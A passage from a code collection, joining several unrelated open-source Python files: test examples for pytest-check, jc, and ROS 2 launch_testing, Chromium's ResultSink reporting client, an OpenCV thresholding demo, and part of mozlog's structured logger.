/examples/test_example_stop_on_fail.py
|
21e2dc960843972152aefa6eb1fa936ffb9a32c3
|
[
"MIT"
] |
permissive
|
okken/pytest-check
|
cd3b82ae31932d54550822abb6cc96fa6b4e7c88
|
c7e7741e4d5665a07b0985932acc484aac2d5095
|
refs/heads/main
| 2023-08-19T09:10:40.776832
| 2023-08-11T20:44:36
| 2023-08-11T20:44:36
| 108,791,429
| 282
| 35
|
MIT
| 2023-08-11T20:37:17
| 2017-10-30T02:22:27
|
Python
|
UTF-8
|
Python
| false
| false
| 604
|
py
|
test_example_stop_on_fail.py
|
"""
An example useful for playing with stop on fail.
-x or --maxfail=1 should result in one failed check and one failed test.
--maxfail=2 should run both tests and catch all 4 check failures
This is because --maxfail=1/-x stops on first failure, check or assert.
Using --maxfail=2 or more counts failing test functions, not check failures.
"""
from pytest_check import check
class TestStopOnFail:
def test_1(self):
check.equal(1, 1)
check.equal(1, 2)
check.equal(1, 3)
def test_2(self):
check.equal(1, 1)
check.equal(1, 2)
check.equal(1, 3)
|
9f0b11fa367ad2d6261563619a5ac5f60a1810cb
|
c19bcbc98555ef06276f9f0dcffc9ac35942a7c4
|
/tests/test_syslog_bsd.py
|
f1a3e389bc7ba19fecb4f321791d5d5856aa100b
|
[
"MIT"
] |
permissive
|
kellyjonbrazil/jc
|
4e81a5421cd20be5965baf375f4a5671c2ef0410
|
4cd721be8595db52b620cc26cd455d95bf56b85b
|
refs/heads/master
| 2023-08-30T09:53:18.284296
| 2023-07-30T17:08:39
| 2023-07-30T17:08:39
| 215,404,927
| 6,278
| 185
|
MIT
| 2023-09-08T14:52:22
| 2019-10-15T22:04:52
|
Python
|
UTF-8
|
Python
| false
| false
| 924
|
py
|
test_syslog_bsd.py
|
import os
import unittest
import json
import jc.parsers.syslog_bsd
THIS_DIR = os.path.dirname(os.path.abspath(__file__))
class MyTests(unittest.TestCase):
# input
with open(os.path.join(THIS_DIR, os.pardir, 'tests/fixtures/generic/syslog-3164.out'), 'r', encoding='utf-8') as f:
syslog = f.read()
# output
with open(os.path.join(THIS_DIR, os.pardir, 'tests/fixtures/generic/syslog-3164.json'), 'r', encoding='utf-8') as f:
syslog_json = json.loads(f.read())
def test_syslog_bsd_nodata(self):
"""
Test 'syslog_bsd' with no data
"""
self.assertEqual(jc.parsers.syslog_bsd.parse('', quiet=True), [])
def test_syslog_bsd_sample(self):
"""
Test 'syslog_bsd' with sample data
"""
self.assertEqual(jc.parsers.syslog_bsd.parse(self.syslog, quiet=True), self.syslog_json)
if __name__ == '__main__':
unittest.main()
|
d8eb343e695705f888937fcd6bb58884f60b4af2
|
26cadb387da6dc71f5536b9d74ad44b7b974d26d
|
/launch_testing/test/launch_testing/test_tools.py
|
3084120d4a1b32a35eb52d1eb8e343390546d48a
|
[
"Apache-2.0",
"BSD-3-Clause"
] |
permissive
|
ros2/launch
|
84971e86f6131976bdfaf872fca12f1a6a377cd6
|
f2b232555900d62c3cec839a49afd4cdc01cda58
|
refs/heads/rolling
| 2023-08-24T14:33:18.237122
| 2023-08-23T17:12:30
| 2023-08-23T17:12:30
| 32,485,326
| 116
| 139
|
Apache-2.0
| 2023-09-14T12:07:30
| 2015-03-18T21:27:58
|
Python
|
UTF-8
|
Python
| false
| false
| 5,547
|
py
|
test_tools.py
|
# Copyright 2019 Open Source Robotics Foundation, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import re
import launch.actions
import launch.events
import launch.launch_context
import launch_testing.io_handler
import launch_testing.proc_info_handler
from launch_testing.tools import basic_output_filter
from launch_testing.tools import expect_output
from launch_testing.tools import ProcessProxy
def test_basic_output_filter():
filter_fn = basic_output_filter(
filtered_patterns=[r'.*\[listener\].*']
)
assert filter_fn('[listener] I heard: foo') == ''
assert filter_fn('[talker] I said: foo') == '[talker] I said: foo'
input_content = """\
[listener] I heard: foo
[listener] I heard: bar
[listener] I heard: foobar
""".replace(' ' * 4, '')
output_content = ''
assert filter_fn(input_content) == output_content
input_content = """\
[talker] I said: foo
[listener] I heard: bar
[listener] I heard: foobar
""".replace(' ' * 4, '')
output_content = """\
[talker] I said: foo
""".replace(' ' * 4, '')
assert filter_fn(input_content) == output_content
input_content = """\
[talker] I said: foo
[talker] I said: bar
[talker] I said: foobar
""".replace(' ' * 4, '')
output_content = input_content
assert filter_fn(input_content) == output_content
def test_expect_output():
output_text = """\
[talker] I said: foo
[listener] I heard: bar
[talker] I said: foo!
[listener] I heard: baz""".replace(' ' * 4, '')
output_lines = output_text.splitlines()
assert expect_output(expected_text=output_text, text=output_text)
assert expect_output(expected_text=output_text, text=output_text, strict=True)
assert expect_output(expected_lines=output_lines, text=output_text)
assert expect_output(expected_lines=output_lines, text=output_text, strict=True)
assert expect_output(expected_text=output_text, lines=output_lines)
assert expect_output(expected_text=output_text, lines=output_lines, strict=True)
assert expect_output(expected_lines=output_lines, lines=output_lines)
assert expect_output(expected_lines=output_lines, lines=output_lines, strict=True)
assert expect_output(
expected_text=re.compile(r'^\[talker\].*$', re.M), text=output_text
)
assert not expect_output(
expected_text=re.compile(r'^\[listener\].*$', re.M),
text=output_text, strict=True
)
assert expect_output(
expected_lines=[
re.compile(r'^\[talker\].*$', re.M),
re.compile(r'^\[listener\].*$', re.M)
] * 2,
text=output_text,
strict=True
)
def test_process_proxy():
proc_output = launch_testing.io_handler.ActiveIoHandler()
proc_info = launch_testing.proc_info_handler.ActiveProcInfoHandler()
process_action = launch.actions.ExecuteProcess(cmd=['ls', '-las'], name='ls')
proxy = ProcessProxy(process_action, proc_info, proc_output)
context = launch.launch_context.LaunchContext()
process_action.prepare(context)
assert not proxy.running
assert not proxy.terminated
proc_info.append(launch.events.process.ProcessStarted(
action=process_action,
name=process_action.name,
cmd=process_action.cmd,
cwd=process_action.cwd,
env=process_action.env,
pid=1001
))
proc_output.track(process_action.name)
assert proxy.running
assert not proxy.terminated
assert proxy.output == ''
assert proxy.stdout == ''
assert proxy.stderr == ''
proc_output.append(launch.events.process.ProcessStdout(
action=process_action,
text='Foobar\n'.encode('utf-8'),
name=process_action.name,
cmd=process_action.cmd,
cwd=process_action.cwd,
env=process_action.env,
pid=1001
))
assert proxy.running
assert not proxy.terminated
assert proxy.output == 'Foobar\n'
assert proxy.stdout == 'Foobar\n'
assert proxy.stderr == ''
proc_output.append(launch.events.process.ProcessStderr(
action=process_action,
text='Warning!\n'.encode('utf-8'),
name=process_action.name,
cmd=process_action.cmd,
cwd=process_action.cwd,
env=process_action.env,
pid=1001
))
assert proxy.running
assert not proxy.terminated
assert proxy.output == 'Foobar\nWarning!\n'
assert proxy.stdout == 'Foobar\n'
assert proxy.stderr == 'Warning!\n'
proc_info.append(launch.events.process.ProcessExited(
action=process_action,
returncode=0,
name=process_action.name,
cmd=process_action.cmd,
cwd=process_action.cwd,
env=process_action.env,
pid=1001
))
assert not proxy.running
assert proxy.terminated
assert proxy.exit_code == 0
assert proxy.output == 'Foobar\nWarning!\n'
assert proxy.stdout == 'Foobar\n'
assert proxy.stderr == 'Warning!\n'
|
20484aa771bd1c2c23d69a9a4f2ceb9f47f40d4c
|
a3d6556180e74af7b555f8d47d3fea55b94bcbda
|
/ios/build/bots/scripts/result_sink_util.py
|
1964791442fee01c4c834fc53270d831c4a42366
|
[
"BSD-3-Clause"
] |
permissive
|
chromium/chromium
|
aaa9eda10115b50b0616d2f1aed5ef35d1d779d6
|
a401d6cf4f7bf0e2d2e964c512ebb923c3d8832c
|
refs/heads/main
| 2023-08-24T00:35:12.585945
| 2023-08-23T22:01:11
| 2023-08-23T22:01:11
| 120,360,765
| 17,408
| 7,102
|
BSD-3-Clause
| 2023-09-10T23:44:27
| 2018-02-05T20:55:32
| null |
UTF-8
|
Python
| false
| false
| 6,613
|
py
|
result_sink_util.py
|
# Copyright 2020 The Chromium Authors
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
import atexit
import base64
import cgi
import json
import logging
import os
import requests
import sys
LOGGER = logging.getLogger(__name__)
# VALID_STATUSES is a list of valid status values for test_result['status'].
# The full list can be obtained at
# https://source.chromium.org/chromium/infra/infra/+/main:go/src/go.chromium.org/luci/resultdb/proto/v1/test_result.proto;drc=ca12b9f52b27f064b0fa47c39baa3b011ffa5790;l=151-174
VALID_STATUSES = {"PASS", "FAIL", "CRASH", "ABORT", "SKIP"}
CRASH_MESSAGE = 'App crashed and disconnected.'
def _compose_test_result(test_id,
status,
expected,
duration=None,
test_log=None,
test_loc=None,
tags=None,
file_artifacts=None):
"""Composes the test_result dict item to be posted to result sink.
Args:
test_id: (str) A unique identifier of the test in LUCI context.
status: (str) Status of the test. Must be one in |VALID_STATUSES|.
duration: (int) Test duration in milliseconds or None if unknown.
expected: (bool) Whether the status is expected.
test_log: (str) Log of the test. Optional.
tags: (list) List of tags. Each item in list should be a length 2 tuple of
string as ("key", "value"). Optional.
test_loc: (dict): Test location metadata as described in
https://source.chromium.org/chromium/infra/infra/+/main:go/src/go.chromium.org/luci/resultdb/proto/v1/test_metadata.proto;l=32;drc=37488404d1c8aa8fccca8caae4809ece08828bae
file_artifacts: (dict) IDs to abs paths mapping of existing files to
report as artifact.
Returns:
A dict of test results with input information, confirming to
https://source.chromium.org/chromium/infra/infra/+/main:go/src/go.chromium.org/luci/resultdb/sink/proto/v1/test_result.proto
"""
tags = tags or []
file_artifacts = file_artifacts or {}
assert status in VALID_STATUSES, (
'%s is not a valid status (one in %s) for ResultSink.' %
(status, VALID_STATUSES))
for tag in tags:
assert len(tag) == 2, 'Items in tags should be length 2 tuples of strings'
assert isinstance(tag[0], str) and isinstance(
tag[1], str), ('Items in'
'tags should be length 2 tuples of strings')
test_result = {
'testId': test_id,
'status': status,
'expected': expected,
'tags': [{
'key': key,
'value': value
} for (key, value) in tags],
'testMetadata': {
'name': test_id,
'location': test_loc,
}
}
test_result['artifacts'] = {
name: {
'filePath': file_artifacts[name]
} for name in file_artifacts
}
if test_log:
message = ''
if sys.version_info.major < 3:
message = base64.b64encode(test_log)
else:
# Python3 b64encode takes and returns bytes. The result must be
# serializable in order for the eventual json.dumps to succeed
message = base64.b64encode(test_log.encode('utf-8')).decode('utf-8')
test_result['summaryHtml'] = '<text-artifact artifact-id="Test Log" />'
if CRASH_MESSAGE in test_log:
test_result['failureReason'] = {'primaryErrorMessage': CRASH_MESSAGE}
test_result['artifacts'].update({
'Test Log': {
'contents': message
},
})
if not test_result['artifacts']:
test_result.pop('artifacts')
if duration:
test_result['duration'] = '%.9fs' % (duration / 1000.0)
return test_result
class ResultSinkClient(object):
"""Stores constants and handles posting to ResultSink."""
def __init__(self):
"""Initiates and stores constants to class."""
self.sink = None
luci_context_file = os.environ.get('LUCI_CONTEXT')
if not luci_context_file:
logging.warning('LUCI_CONTEXT not found in environment. ResultDB'
' integration disabled.')
return
with open(luci_context_file) as f:
self.sink = json.load(f).get('result_sink')
if not self.sink:
logging.warning('ResultSink constants not found in LUCI context.'
' ResultDB integration disabled.')
return
self.url = ('http://%s/prpc/luci.resultsink.v1.Sink/ReportTestResults' %
self.sink['address'])
self.headers = {
'Content-Type': 'application/json',
'Accept': 'application/json',
'Authorization': 'ResultSink %s' % self.sink['auth_token'],
}
self._session = requests.Session()
# Ensure session is closed at exit.
atexit.register(self.close)
logging.getLogger("urllib3.connectionpool").setLevel(logging.WARNING)
def close(self):
"""Closes the connection to result sink server."""
if not self.sink:
return
LOGGER.info('Closing connection with result sink server.')
# Reset to default logging level of test runner scripts.
logging.getLogger("urllib3.connectionpool").setLevel(logging.DEBUG)
self._session.close()
def post(self, test_id, status, expected, **kwargs):
"""Composes and posts a test and status to result sink.
Args:
test_id: (str) A unique identifier of the test in LUCI context.
status: (str) Status of the test. Must be one in |VALID_STATUSES|.
expected: (bool) Whether the status is expected.
**kwargs: Optional keyword args. Namely:
duration: (int) Test duration in milliseconds or None if unknown.
test_log: (str) Log of the test. Optional.
tags: (list) List of tags. Each item in list should be a length 2 tuple
of string as ("key", "value"). Optional.
file_artifacts: (dict) IDs to abs paths mapping of existing files to
report as artifact.
"""
if not self.sink:
return
self._post_test_result(
_compose_test_result(test_id, status, expected, **kwargs))
def _post_test_result(self, test_result):
"""Posts single test result to server.
This method assumes |self.sink| is not None.
Args:
test_result: (dict) Confirming to protocol defined in
https://source.chromium.org/chromium/infra/infra/+/main:go/src/go.chromium.org/luci/resultdb/sink/proto/v1/test_result.proto
"""
res = self._session.post(
url=self.url,
headers=self.headers,
data=json.dumps({'testResults': [test_result]}),
)
res.raise_for_status()
|
40e02e9662be9e7b5bd53db48d4a3d7757208bcf
|
0d9b75fee49b37038a10e467c39cf75c9cf4d5ae
|
/OpenCV_learn/code_045/opencv_045.py
|
7111bcb3aecc83dda462febeac76a68b054b75f1
|
[] |
no_license
|
MachineLP/OpenCV-
|
743a5fcfc3f300ccb135f869e2f048cb5fdcd02a
|
f3da4feb71c20d2e8bc426eb5a4e2e61a2fd4a75
|
refs/heads/master
| 2023-03-23T15:31:22.985413
| 2023-03-08T09:33:28
| 2023-03-08T09:33:28
| 178,887,816
| 104
| 51
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,156
|
py
|
opencv_045.py
|
import cv2 as cv
import numpy as np
def method_1(image):
gray = cv.cvtColor(image, cv.COLOR_BGR2GRAY)
t, binary = cv.threshold(gray, 0, 255, cv.THRESH_BINARY | cv.THRESH_OTSU)
return binary
def method_2(image):
blurred = cv.GaussianBlur(image, (3, 3), 0)
gray = cv.cvtColor(blurred, cv.COLOR_BGR2GRAY)
t, binary = cv.threshold(gray, 0, 255, cv.THRESH_BINARY | cv.THRESH_OTSU)
return binary
def method_3(image):
blurred = cv.pyrMeanShiftFiltering(image, 10, 100)
gray = cv.cvtColor(blurred, cv.COLOR_BGR2GRAY)
t, binary = cv.threshold(gray, 0, 255, cv.THRESH_BINARY | cv.THRESH_OTSU)
return binary
src = cv.imread("./test.png")
h, w = src.shape[:2]
ret = method_3(src)
result = np.zeros([h, w*2, 3], dtype=src.dtype)
result[0:h,0:w,:] = src
result[0:h,w:2*w,:] = cv.cvtColor(ret, cv.COLOR_GRAY2BGR)
cv.putText(result, "input", (10, 30), cv.FONT_ITALIC, 1.0, (0, 0, 255), 2)
cv.putText(result, "binary", (w+10, 30), cv.FONT_ITALIC, 1.0, (0, 0, 255), 2)
cv.imshow("result", result)
cv.imwrite("./binary_result.png", result)
cv.waitKey(0)
cv.destroyAllWindows()
|
19dd23872e8261c7b62ef2e337e7d170b8b13418
|
a3d6556180e74af7b555f8d47d3fea55b94bcbda
|
/third_party/wpt_tools/wpt/tools/third_party_modified/mozlog/mozlog/structuredlog.py
|
20924e8b16a61cbbe771547a2395b1a0c35b5a7a
|
[
"BSD-3-Clause",
"GPL-1.0-or-later",
"MIT",
"LGPL-2.0-or-later",
"Apache-2.0"
] |
permissive
|
chromium/chromium
|
aaa9eda10115b50b0616d2f1aed5ef35d1d779d6
|
a401d6cf4f7bf0e2d2e964c512ebb923c3d8832c
|
refs/heads/main
| 2023-08-24T00:35:12.585945
| 2023-08-23T22:01:11
| 2023-08-23T22:01:11
| 120,360,765
| 17,408
| 7,102
|
BSD-3-Clause
| 2023-09-10T23:44:27
| 2018-02-05T20:55:32
| null |
UTF-8
|
Python
| false
| false
| 27,968
|
py
|
structuredlog.py
|
# This Source Code Form is subject to the terms of the Mozilla Public
# License, v. 2.0. If a copy of the MPL was not distributed with this
# file, You can obtain one at http://mozilla.org/MPL/2.0/.
import json
import sys
import time
import traceback
from multiprocessing import current_process
from threading import Lock, current_thread
from .logtypes import (
Any,
Boolean,
Dict,
Int,
List,
Nullable,
Status,
SubStatus,
TestId,
TestList,
Tuple,
Unicode,
convertor_registry,
log_action,
)
"""Structured Logging for recording test results.
Allowed actions, and subfields:
suite_start
tests - List of test names
name - Name for the suite
run_info - Dictionary of run properties
add_subsuite
name - Name for the subsuite (must be unique)
run_info - Updates to the suite run_info (optional)
suite_end
test_start
test - ID for the test
path - Relative path to test (optional)
subsuite - Name of the subsuite to which test belongs (optional)
test_end
test - ID for the test
status [PASS | FAIL | OK | ERROR | TIMEOUT | CRASH |
ASSERT PRECONDITION_FAILED | SKIP] - test status
expected [As for status] - Status that the test was expected to get,
or absent if the test got the expected status
extra - Dictionary of harness-specific extra information e.g. debug info
known_intermittent - List of known intermittent statuses that should
not fail a test. eg. ['FAIL', 'TIMEOUT']
subsuite - Name of the subsuite to which test belongs (optional)
test_status
test - ID for the test
subtest - Name of the subtest
status [PASS | FAIL | TIMEOUT |
PRECONDITION_FAILED | NOTRUN | SKIP] - test status
expected [As for status] - Status that the subtest was expected to get,
or absent if the subtest got the expected status
known_intermittent - List of known intermittent statuses that should
not fail a test. eg. ['FAIL', 'TIMEOUT']
subsuite - Name of the subsuite to which test belongs (optional)
process_output
process - PID of the process
command - Command line of the process
data - Output data from the process
test - ID of the test that the process was running (optional)
subsuite - Name of the subsuite that the process was running (optional)
assertion_count
count - Number of assertions produced
min_expected - Minimum expected number of assertions
max_expected - Maximum expected number of assertions
subsuite - Name of the subsuite for the tests that ran (optional)
lsan_leak
frames - List of stack frames from the leak report
scope - An identifier for the set of tests run during the browser session
(e.g. a directory name)
allowed_match - A stack frame in the list that matched a rule meaning the
leak is expected
subsuite - Name of the subsuite for the tests that ran (optional)
lsan_summary
bytes - Number of bytes leaked
allocations - Number of allocations
allowed - Boolean indicating whether all detected leaks matched allow rules
subsuite - Name of the subsuite for the tests that ran (optional)
mozleak_object
process - Process that leaked
bytes - Number of bytes that leaked
name - Name of the object that leaked
scope - An identifier for the set of tests run during the browser session
(e.g. a directory name)
allowed - Boolean indicating whether the leak was permitted
subsuite - Name of the subsuite for the tests that ran (optional)
log
level [CRITICAL | ERROR | WARNING |
INFO | DEBUG] - level of the logging message
message - Message to log
Subfields for all messages:
action - the action type of the current message
time - the timestamp in ms since the epoch of the log message
thread - name for the thread emitting the message
pid - id of the python process in which the logger is running
source - name for the source emitting the message
component - name of the subcomponent emitting the message
"""
_default_logger_name = None
def get_default_logger(component=None):
"""Gets the default logger if available, optionally tagged with component
name. Will return None if not yet set
:param component: The component name to tag log messages with
"""
global _default_logger_name
if not _default_logger_name:
return None
return StructuredLogger(_default_logger_name, component=component)
def set_default_logger(default_logger):
"""Sets the default logger to logger.
It can then be retrieved with :py:func:`get_default_logger`
Note that :py:func:`~mozlog.commandline.setup_logging` will
set a default logger for you, so there should be no need to call this
function if you're using setting up logging that way (recommended).
:param default_logger: The logger to set to default.
"""
global _default_logger_name
_default_logger_name = default_logger.name
log_levels = dict(
(k.upper(), v)
for v, k in enumerate(["critical", "error", "warning", "info", "debug"])
)
lint_levels = ["ERROR", "WARNING"]
def log_actions():
"""Returns the set of actions implemented by mozlog."""
return set(convertor_registry.keys())
class LoggerShutdownError(Exception):
"""Raised when attempting to log after logger.shutdown() has been called."""
class LoggerState(object):
def __init__(self):
self.reset()
def reset(self):
self.handlers = []
self.subsuites = set()
self.running_tests = set()
self.suite_started = False
self.component_states = {}
self.has_shutdown = False
class ComponentState(object):
def __init__(self):
self.filter_ = None
class StructuredLogger(object):
_lock = Lock()
_logger_states = {}
"""Create a structured logger with the given name
:param name: The name of the logger.
:param component: A subcomponent that the logger belongs to (typically a library name)
"""
def __init__(self, name, component=None):
self.name = name
self.component = component
with self._lock:
if name not in self._logger_states:
self._logger_states[name] = LoggerState()
if component not in self._logger_states[name].component_states:
self._logger_states[name].component_states[component] = ComponentState()
self._state = self._logger_states[name]
self._component_state = self._state.component_states[component]
def add_handler(self, handler):
"""Add a handler to the current logger"""
self._state.handlers.append(handler)
def remove_handler(self, handler):
"""Remove a handler from the current logger"""
self._state.handlers.remove(handler)
def reset_state(self):
"""Resets the logger to a brand new state. This means all handlers
are removed, running tests are discarded and components are reset.
"""
self._state.reset()
self._component_state = self._state.component_states[
self.component
] = ComponentState()
def send_message(self, topic, command, *args):
"""Send a message to each handler configured for this logger. This
part of the api is useful to those users requiring dynamic control
of a handler's behavior.
:param topic: The name used by handlers to subscribe to a message.
:param command: The name of the command to issue.
:param args: Any arguments known to the target for specialized
behavior.
"""
rv = []
for handler in self._state.handlers:
if hasattr(handler, "message_handler"):
rv += handler.message_handler.handle_message(topic, command, *args)
return rv
@property
def handlers(self):
"""A list of handlers that will be called when a
message is logged from this logger"""
return self._state.handlers
@property
def component_filter(self):
return self._component_state.filter_
@component_filter.setter
def component_filter(self, value):
self._component_state.filter_ = value
def log_raw(self, raw_data):
if "action" not in raw_data:
raise ValueError
action = raw_data["action"]
converted_data = convertor_registry[action].convert_known(**raw_data)
for k, v in raw_data.items():
if (
k not in converted_data and
k not in convertor_registry[action].optional_args
):
converted_data[k] = v
data = self._make_log_data(action, converted_data)
if action in ("test_status", "test_end"):
if (
data["expected"] == data["status"] or
data["status"] == "SKIP" or
"expected" not in raw_data
):
del data["expected"]
if not self._ensure_suite_state(action, data):
return
self._handle_log(data)
def _log_data(self, action, data=None):
if data is None:
data = {}
if data.get("subsuite") and data["subsuite"] not in self._state.subsuites:
self.error(f"Unrecognised subsuite {data['subsuite']}")
return
log_data = self._make_log_data(action, data)
self._handle_log(log_data)
def _handle_log(self, data):
if self._state.has_shutdown:
raise LoggerShutdownError(
"{} action received after shutdown.".format(data["action"])
)
with self._lock:
if self.component_filter:
data = self.component_filter(data)
if data is None:
return
for handler in self.handlers:
try:
handler(data)
except Exception:
# Write the exception details directly to stderr because
# log() would call this method again which is currently locked.
print(
"%s: Failure calling log handler:" % __name__,
file=sys.__stderr__,
)
print(traceback.format_exc(), file=sys.__stderr__)
def _make_log_data(self, action, data):
all_data = {
"action": action,
"time": int(time.time() * 1000),
"thread": current_thread().name,
"pid": current_process().pid,
"source": self.name,
}
if self.component:
all_data["component"] = self.component
all_data.update(data)
return all_data
def _ensure_suite_state(self, action, data):
if action == "suite_start":
if self._state.suite_started:
# limit data to reduce unnecessary log bloat
self.error(
"Got second suite_start message before suite_end. " +
"Logged with data: {}".format(json.dumps(data)[:100])
)
return False
self._state.suite_started = True
elif action == "suite_end":
if not self._state.suite_started:
self.error(
"Got suite_end message before suite_start. " +
"Logged with data: {}".format(json.dumps(data))
)
return False
self._state.suite_started = False
return True
@log_action(
TestList("tests"),
Unicode("name", default=None, optional=True),
Dict(Any, "run_info", default=None, optional=True),
Dict(Any, "version_info", default=None, optional=True),
Dict(Any, "device_info", default=None, optional=True),
Dict(Any, "extra", default=None, optional=True),
)
def suite_start(self, data):
"""Log a suite_start message
:param dict tests: Test identifiers that will be run in the suite, keyed by group name.
:param str name: Optional name to identify the suite.
:param dict run_info: Optional information typically provided by mozinfo.
:param dict version_info: Optional target application version information provided
by mozversion.
:param dict device_info: Optional target device information provided by mozdevice.
"""
if not self._ensure_suite_state("suite_start", data):
return
self._log_data("suite_start", data)
@log_action(
Unicode("name"),
Dict(Any, "run_info", default=None, optional=True),
)
def add_subsuite(self, data):
"""Log a add_subsuite message
:param str name: Name to identify the subsuite.
:param dict run_info: Optional information about the subsuite. This updates the suite run_info.
"""
if data["name"] in self._state.subsuites:
return
run_info = data.get("run_info", {"subsuite": data["name"]})
if "subsuite" not in run_info:
run_info = run_info.copy()
run_info["subsuite"] = data["name"]
data["run_info"] = run_info
self._state.subsuites.add(data["name"])
self._log_data("add_subsuite", data)
@log_action(Dict(Any, "extra", default=None, optional=True))
def suite_end(self, data):
"""Log a suite_end message"""
if not self._ensure_suite_state("suite_end", data):
return
self._state.subsuites.clear()
self._log_data("suite_end", data)
@log_action(
TestId("test"),
Unicode("path", default=None, optional=True),
Unicode("subsuite", default=None, optional=True),
)
def test_start(self, data):
"""Log a test_start message
:param test: Identifier of the test that will run.
:param path: Path to test relative to some base (typically the root of
the source tree).
:param subsuite: Optional name of the subsuite to which the test belongs.
"""
if not self._state.suite_started:
self.error(
"Got test_start message before suite_start for test %s" % data["test"]
)
return
test_key = (data.get("subsuite"), data["test"])
if test_key in self._state.running_tests:
self.error("test_start for %s logged while in progress." % data["test"])
return
self._state.running_tests.add(test_key)
self._log_data("test_start", data)
@log_action(
TestId("test"),
Unicode("subtest"),
SubStatus("status"),
SubStatus("expected", default="PASS"),
Unicode("message", default=None, optional=True),
Unicode("stack", default=None, optional=True),
Dict(Any, "extra", default=None, optional=True),
List(SubStatus, "known_intermittent", default=None, optional=True),
Unicode("subsuite", default=None, optional=True),
)
def test_status(self, data):
"""
Log a test_status message indicating a subtest result. Tests that
do not have subtests are not expected to produce test_status messages.
:param test: Identifier of the test that produced the result.
:param subtest: Name of the subtest.
:param status: Status string indicating the subtest result
:param expected: Status string indicating the expected subtest result.
:param message: Optional string containing a message associated with the result.
:param stack: Optional stack trace encountered during test execution.
:param extra: Optional suite-specific data associated with the test result.
:param known_intermittent: Optional list of string expected intermittent statuses
:param subsuite: Optional name of the subsuite to which the test belongs.
"""
if data["expected"] == data["status"] or data["status"] == "SKIP":
del data["expected"]
test_key = (data.get("subsuite"), data["test"])
if test_key not in self._state.running_tests:
self.error(
"test_status for %s logged while not in progress. "
"Logged with data: %s" % (data["test"], json.dumps(data))
)
return
self._log_data("test_status", data)
@log_action(
TestId("test"),
Status("status"),
Status("expected", default="OK"),
Unicode("message", default=None, optional=True),
Unicode("stack", default=None, optional=True),
Dict(Any, "extra", default=None, optional=True),
List(Status, "known_intermittent", default=None, optional=True),
Unicode("subsuite", default=None, optional=True),
)
def test_end(self, data):
"""
Log a test_end message indicating that a test completed. For tests
with subtests this indicates whether the overall test completed without
errors. For tests without subtests this indicates the test result
directly.
:param test: Identifier of the test that produced the result.
:param status: Status string indicating the test result
:param expected: Status string indicating the expected test result.
:param message: Optonal string containing a message associated with the result.
:param stack: Optional stack trace encountered during test execution.
:param extra: Optional suite-specific data associated with the test result.
:param subsuite: Optional name of the subsuite to which the test belongs.
"""
if data["expected"] == data["status"] or data["status"] == "SKIP":
del data["expected"]
test_key = (data.get("subsuite"), data["test"])
if test_key not in self._state.running_tests:
self.error(
"test_end for %s logged while not in progress. "
"Logged with data: %s" % (data["test"], json.dumps(data))
)
else:
self._state.running_tests.remove(test_key)
self._log_data("test_end", data)
@log_action(
Unicode("process"),
Unicode("data"),
Unicode("command", default=None, optional=True),
TestId("test", default=None, optional=True),
Unicode("subsuite", default=None, optional=True),
)
def process_output(self, data):
"""Log output from a managed process.
:param process: A unique identifier for the process producing the output
(typically the pid)
:param data: The output to log
:param command: Optional string representing the full command line used to start
the process.
:param test: Optional ID of the test which the process was running.
:param subsuite: Optional name of the subsuite which the process was running.
"""
self._log_data("process_output", data)
@log_action(
Unicode("process", default=None),
Unicode("signature", default="[Unknown]"),
TestId("test", default=None, optional=True),
Unicode("minidump_path", default=None, optional=True),
Unicode("minidump_extra", default=None, optional=True),
Int("stackwalk_retcode", default=None, optional=True),
Unicode("stackwalk_stdout", default=None, optional=True),
Unicode("stackwalk_stderr", default=None, optional=True),
Unicode("reason", default=None, optional=True),
Unicode("java_stack", default=None, optional=True),
Unicode("process_type", default=None, optional=True),
List(Unicode, "stackwalk_errors", default=None),
Unicode("subsuite", default=None, optional=True),
)
def crash(self, data):
if data["stackwalk_errors"] is None:
data["stackwalk_errors"] = []
self._log_data("crash", data)
@log_action(
Unicode("primary", default=None), List(Unicode, "secondary", default=None)
)
def valgrind_error(self, data):
self._log_data("valgrind_error", data)
@log_action(
Unicode("process"),
Unicode("command", default=None, optional=True),
Unicode("subsuite", default=None, optional=True),
)
def process_start(self, data):
"""Log start event of a process.
:param process: A unique identifier for the process producing the
output (typically the pid)
:param command: Optional string representing the full command line used to
start the process.
:param subsuite: Optional name of the subsuite using the process.
"""
self._log_data("process_start", data)
@log_action(
Unicode("process"),
Int("exitcode"),
Unicode("command", default=None, optional=True),
Unicode("subsuite", default=None, optional=True),
)
def process_exit(self, data):
"""Log exit event of a process.
:param process: A unique identifier for the process producing the
output (typically the pid)
:param exitcode: the exit code
:param command: Optional string representing the full command line used to
start the process.
:param subsuite: Optional name of the subsuite using the process.
"""
self._log_data("process_exit", data)
@log_action(
TestId("test"),
Int("count"),
Int("min_expected"),
Int("max_expected"),
Unicode("subsuite", default=None, optional=True),
)
def assertion_count(self, data):
"""Log count of assertions produced when running a test.
:param count: Number of assertions produced
:param min_expected: Minimum expected number of assertions
:param max_expected: Maximum expected number of assertions
:param subsuite: Optional name of the subsuite for the tests that ran
"""
self._log_data("assertion_count", data)
@log_action(
List(Unicode, "frames"),
Unicode("scope", optional=True, default=None),
Unicode("allowed_match", optional=True, default=None),
Unicode("subsuite", default=None, optional=True),
)
def lsan_leak(self, data):
self._log_data("lsan_leak", data)
@log_action(
Int("bytes"),
Int("allocations"),
Boolean("allowed", optional=True, default=False),
Unicode("subsuite", default=None, optional=True),
)
def lsan_summary(self, data):
self._log_data("lsan_summary", data)
@log_action(
Unicode("process"),
Int("bytes"),
Unicode("name"),
Unicode("scope", optional=True, default=None),
Boolean("allowed", optional=True, default=False),
Unicode("subsuite", default=None, optional=True),
)
def mozleak_object(self, data):
self._log_data("mozleak_object", data)
@log_action(
Unicode("process"),
Nullable(Int, "bytes"),
Int("threshold"),
List(Unicode, "objects"),
Unicode("scope", optional=True, default=None),
Boolean("induced_crash", optional=True, default=False),
Boolean("ignore_missing", optional=True, default=False),
Unicode("subsuite", default=None, optional=True),
)
def mozleak_total(self, data):
self._log_data("mozleak_total", data)
@log_action()
def shutdown(self, data):
"""Shutdown the logger.
This logs a 'shutdown' action after which any further attempts to use
